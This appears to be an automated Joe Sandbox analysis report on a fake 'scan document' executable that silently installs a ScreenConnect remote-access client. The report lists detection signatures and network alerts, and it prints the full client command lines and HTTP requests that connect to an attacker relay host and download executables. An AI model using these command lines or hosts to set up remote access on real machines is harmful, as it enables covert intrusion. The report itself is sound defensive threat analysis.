Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Scan_doc_09_16_24_1203.exe

Overview

General Information

Sample name:Scan_doc_09_16_24_1203.exe
Analysis ID:1523875
MD5:0753315cbf45a34d4402e7b04a17fddf
SHA1:5fe769171802694bb13fd3388065c111c8740beb
SHA256:96cda11b1a4aabf9b2f7695a8b9a87aaa6ff6ae9f2748d89fe7bba2a393703f7
Tags:exefiledn-comuser-JAMESWT_MHT
Infos:

Detection

ScreenConnect Tool
Score:66
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:33
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to hide user accounts
Creates files in the system32 config directory
Enables network access during safeboot for specific services
Initial sample is a PE file and has a suspicious name
Reads the Security eventlog
Reads the System eventlog
AV process strings found (often used to terminate AV products)
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
One or more processes crash
PE file contains an invalid checksum
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports
Stores large binary data to the registry
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

  • System is w10x64
  • Scan_doc_09_16_24_1203.exe (PID: 7140 cmdline: "C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe" MD5: 0753315CBF45A34D4402E7B04A17FDDF)
    • dfsvc.exe (PID: 6176 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe" MD5: B4088F44B80D363902E11F897A7BAC09)
      • ScreenConnect.WindowsClient.exe (PID: 7416 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe" MD5: 20AB8141D958A58AADE5E78671A719BF)
        • ScreenConnect.ClientService.exe (PID: 7452 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=ttyuio.zapto.org&p=8041&s=e76a7089-9bd3-460c-8e9c-7b01b18dcd91&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1" MD5: 361BCC2CB78C75DD6F583AF81834E447)
    • WerFault.exe (PID: 1136 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7140 -s 884 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 2484 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 2916 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 7140 -ip 7140 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 2596 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • ScreenConnect.ClientService.exe (PID: 7476 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=ttyuio.zapto.org&p=8041&s=e76a7089-9bd3-460c-8e9c-7b01b18dcd91&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1" MD5: 361BCC2CB78C75DD6F583AF81834E447)
    • ScreenConnect.WindowsClient.exe (PID: 7544 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe" "RunRole" "d21d76fd-518c-4e0e-8974-ad827e70c72a" "User" MD5: 20AB8141D958A58AADE5E78671A719BF)
    • ScreenConnect.WindowsClient.exe (PID: 7664 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe" "RunRole" "ebaebc1a-63a2-4828-be16-c29c94055c3f" "System" MD5: 20AB8141D958A58AADE5E78671A719BF)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
    C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
      SourceRuleDescriptionAuthorStrings
      00000009.00000000.1953506652.0000000000102000.00000002.00000001.01000000.0000000B.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
        00000009.00000002.1965529685.0000000002397000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
          00000001.00000002.2619140064.00000261803F5000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
            Process Memory Space: dfsvc.exe PID: 6176JoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
              Process Memory Space: ScreenConnect.WindowsClient.exe PID: 7416JoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                Click to see the 1 entries
                SourceRuleDescriptionAuthorStrings
                9.0.ScreenConnect.WindowsClient.exe.100000.0.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security

                  System Summary

                  barindex
                  Source: Network ConnectionAuthor: Nasreddine Bencherchali (Nextron Systems): Data: DestinationIp: 192.168.2.4, DestinationIsIpv6: false, DestinationPort: 49731, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Initiated: true, ProcessId: 6176, Protocol: tcp, SourceIp: 178.215.236.119, SourceIsIpv6: false, SourcePort: 443
                  Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 2484, ProcessName: svchost.exe
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-02T06:16:27.400359+020020098971A Network Trojan was detected178.215.236.119443192.168.2.449747TCP
                  2024-10-02T06:16:28.527421+020020098971A Network Trojan was detected178.215.236.119443192.168.2.449749TCP
                  2024-10-02T06:16:32.632868+020020098971A Network Trojan was detected178.215.236.119443192.168.2.449753TCP
                  2024-10-02T06:16:33.732202+020020098971A Network Trojan was detected178.215.236.119443192.168.2.449754TCP
                  2024-10-02T06:16:35.195398+020020098971A Network Trojan was detected178.215.236.119443192.168.2.449755TCP
                  2024-10-02T06:16:36.308287+020020098971A Network Trojan was detected178.215.236.119443192.168.2.449758TCP
                  2024-10-02T06:16:38.610321+020020098971A Network Trojan was detected178.215.236.119443192.168.2.449761TCP
                  2024-10-02T06:16:40.355840+020020098971A Network Trojan was detected178.215.236.119443192.168.2.449762TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: Scan_doc_09_16_24_1203.exeReversingLabs: Detection: 15%
                  Source: Scan_doc_09_16_24_1203.exeVirustotal: Detection: 13%Perma Link
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 89.2% probability
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exeCode function: 0_2_005E1000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_005E1000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exeJump to behavior

                  Compliance

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exeJump to behavior
                  Source: Scan_doc_09_16_24_1203.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: Scan_doc_09_16_24_1203.exeStatic PE information: certificate valid
                  Source: unknownHTTPS traffic detected: 178.215.236.119:443 -> 192.168.2.4:49731 version: TLS 1.2
                  Source: Scan_doc_09_16_24_1203.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: dfsvc.exe, 00000001.00000002.2619140064.000002618066B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261806B9000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.0000026180244000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1966710075.000000001AD32000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: Scan_doc_09_16_24_1203.exe
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.2619140064.00000261806F1000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.0000026180667000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.0000026180240000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000A.00000002.1963256182.0000000003322000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000C.00000002.2960868072.0000000003321000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.2020769153.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.2020718098.0000000002DF0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.1.dr, ScreenConnect.ClientService.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1953506652.0000000000102000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 0000000A.00000000.1959458553.0000000000C1D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.2619140064.00000261806F1000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.0000026180663000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.000002618023C000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1966891109.000000001B352000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1953506652.0000000000102000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: dfsvc.exe, 00000001.00000002.2619140064.00000261806F1000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.0000026180663000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.000002618023C000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1966891109.000000001B352000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000001.00000002.2619140064.000002618066B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261806B9000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.0000026180244000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1966710075.000000001AD32000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.2619140064.0000026180234000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000A.00000002.1963598655.00000000057A2000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll0.1.dr
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\Jump to behavior

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 178.215.236.119:443 -> 192.168.2.4:49747
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 178.215.236.119:443 -> 192.168.2.4:49755
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 178.215.236.119:443 -> 192.168.2.4:49758
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 178.215.236.119:443 -> 192.168.2.4:49753
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 178.215.236.119:443 -> 192.168.2.4:49749
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 178.215.236.119:443 -> 192.168.2.4:49761
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 178.215.236.119:443 -> 192.168.2.4:49762
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 178.215.236.119:443 -> 192.168.2.4:49754
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeRegistry value created: NULL Service
                  Source: global trafficTCP traffic: 192.168.2.4:49766 -> 178.215.236.119:8041
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=ttyuio.zapto.org&p=8041&s=e76a7089-9bd3-460c-8e9c-7b01b18dcd91&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzip
                  Source: Joe Sandbox ViewIP Address: 178.215.236.119 178.215.236.119
                  Source: Joe Sandbox ViewASN Name: LVLT-10753US LVLT-10753US
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=ttyuio.zapto.org&p=8041&s=e76a7089-9bd3-460c-8e9c-7b01b18dcd91&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzip
